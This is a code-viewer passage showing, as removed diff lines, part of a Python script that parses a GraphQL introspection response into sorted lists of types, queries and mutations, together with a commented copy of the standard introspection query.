    168  - arg.ttype = ttype
    169  - o.args.append( arg )
    170  - 
    171  - if o.ttype == 'QUERY':
    172  - t_queries.append( o )
    173  - else:
    174  - t_mutations.append( o )
    175  - else:
    176  - if v['name'] in t_keywords:
    177  - continue
    178  - 
    179  - o = GraphqlObject()
    180  - o.name = v['name']
    181  - o.ttype = v['kind']
    182  - 
    183  - if 'fields' in v and type(v['fields']) is list and len(v['fields'])>0:
    184  - for vv in v['fields']:
    185  - if vv['type']['name']:
    186  - ttype = vv['type']['name']
    187  - elif vv['type']['ofType']['name']:
    188  - ttype = vv['type']['ofType']['name']
    189  - elif vv['type']['ofType']['ofType']['name']:
    190  - ttype = vv['type']['ofType']['ofType']['name']
    191  - elif vv['type']['ofType']['ofType']['ofType']['name']:
    192  - ttype = vv['type']['ofType']['ofType']['ofType']['name']
    193  - attr = GraphqlAttribut()
    194  - attr.name = vv['name']
    195  - attr.ttype = ttype
    196  - o.attrs.append( attr )
    197  - 
    198  - if 'inputFields' in v and type(v['inputFields']) is list and len(v['inputFields'])>0:
    199  - for vv in v['inputFields']:
    200  - if vv['type']['name']:
    201  - ttype = vv['type']['name']
    202  - elif vv['type']['ofType']['name']:
    203  - ttype = vv['type']['ofType']['name']
    204  - elif vv['type']['ofType']['ofType']['name']:
    205  - ttype = vv['type']['ofType']['ofType']['name']
    206  - elif vv['type']['ofType']['ofType']['ofType']['name']:
    207  - ttype = vv['type']['ofType']['ofType']['ofType']['name']
    208  - i = GraphqlAttribut()
    209  - i.name = vv['name']
    210  - i.ttype = ttype
    211  - o.inputs.append( i )
    212  - 
    213  - if 'enumValues' in v and type(v['enumValues']) is list and len(v['enumValues'])>0:
    214  - for vv in v['enumValues']:
    215  - value = GraphqlValue()
    216  - value.name = vv['name']
    217  - o.values.append( value )
    218  - 
    219  - t_objects.append( o );
    220  - 
    221  -if len(t_objects):
    222  - l = sorted( t_objects, key=lambda w:attrgetter('name')(w).lower() )
    223  - for o in l:
    224  - displayTypeO( o )
    225  - 
    226  -if len(t_queries):
    227  - l = sorted( t_queries, key=lambda w:attrgetter('name')(w).lower() )
    228  - for q in l:
    229  - displayTypeQM( q )
    230  - 
    231  -if len(t_mutations):
    232  - l = sorted( t_mutations, key=lambda w:attrgetter('name')(w).lower() )
    233  - for m in l:
    234  - displayTypeQM( m )
    235  - 
    236  - 
    237  -# query IntrospectionQuery {
    238  -# __schema {
    239  -# queryType { name }
    240  -# mutationType { name }
    241  -# subscriptionType { name }
    242  -# types {
    243  -# ...FullType
    244  -# }
    245  -# directives {
    246  -# name
    247  -# description
    248  -# locations
    249  -# args {
    250  -# ...InputValue
    251  -# }
    252  -# }
    253  -# }
    254  -# }
    255  - 
    256  -# fragment FullType on __Type {
    257  -# kind
    258  -# name
    259  -# description
    260  -# fields(includeDeprecated: true) {
    261  -# name
    262  -# description
    263  -# args {
    264  -# ...InputValue
    265  -# }
    266  -# type {
    267  -# ...TypeRef
    268  -# }
    269  -# isDeprecated
    270  -# deprecationReason
    271  -# }
    272  -# inputFields {
    273  -# ...InputValue
    274  -# }
    275  -# interfaces {
    276  -# ...TypeRef
    277  -# }
    278  -# enumValues(includeDeprecated: true) {
    279  -# name
    280  -# description
    281  -# isDeprecated
    282  -# deprecationReason
    283  -# }
    284  -# possibleTypes {
    285  -# ...TypeRef
    286  -# }
    287  -# }
    288  - 
    289  -# fragment InputValue on __InputValue {
    290  -# name
    291  -# description
    292  -# type { ...TypeRef }
    293  -# defaultValue
    294  -# }
    295  - 
    296  -# fragment TypeRef on __Type {
    297  -# kind
    298  -# name
    299  -# ofType {
    300  -# kind
    301  -# name
    302  -# ofType {
    303  -# kind
    304  -# name
    305  -# ofType {
    306  -# kind
    307  -# name
    308  -# ofType {
    309  -# kind
    310  -# name
    311  -# ofType {
    312  -# kind
    313  -# name
    314  -# ofType {
    315  -# kind
    316  -# name
    317  -# ofType {
    318  -# kind
    319  -# name
    320  -# }
    321  -# }
    322  -# }
    323  -# }
    324  -# }
    325  -# }
    326  -# }
    327  -# }
    328  - 
Please wait...
Page is in error, reload to recover